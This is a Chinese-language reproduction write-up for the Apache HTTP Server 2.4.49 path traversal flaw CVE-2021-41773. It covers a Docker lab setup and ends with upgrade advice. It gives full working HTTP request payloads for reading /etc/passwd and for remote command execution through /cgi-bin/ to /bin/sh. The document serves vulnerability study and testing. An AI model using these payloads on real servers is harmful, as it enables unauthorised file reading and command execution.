Apache HTTP Server路径穿越漏洞 (CVE-2021-41773)
漏洞描述
攻击者可以使用路径遍历攻击将URL映射到预期文档根以外的文件。如果文档根目录以外的文件不受require all denied
保护,则攻击者可以访问这些文件。
CVE编号
CVE-2021-41773
漏洞影响范围
仅影响Apache HTTP Server 2.4.49版本
漏洞评级
高危
漏洞复现
环境搭建
这里用github的项目进行漏洞复现
项目下载地址:https://github.com/blasty/CVE-2021-41773
下载好后进入该文件夹
docker-compose build && docker-compose up -d
查看映射的端口
docker ps
访问本地的8080端口
环境搭建成功
如果启动容器时发生错误
则进入容器,修改
vim /etc/apache2/apache2.conf
在最后一行加入
ServerName localhost:80
保存后退出重启apache服务
apachectl restart
任意文件读取
POC:
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 19 Jan 2022 06:29:11 GMT
If-None-Match: "29cd-5d5e980f21bc0-gzip"
Cache-Control: max-age=0
RCE
POC:
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 192.168.109.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 19 Jan 2022 06:29:11 GMT
If-None-Match: "29cd-5d5e980f21bc0-gzip"
Cache-Control: max-age=0
Content-Length: 7
echo;id
修复建议
升级到最新版本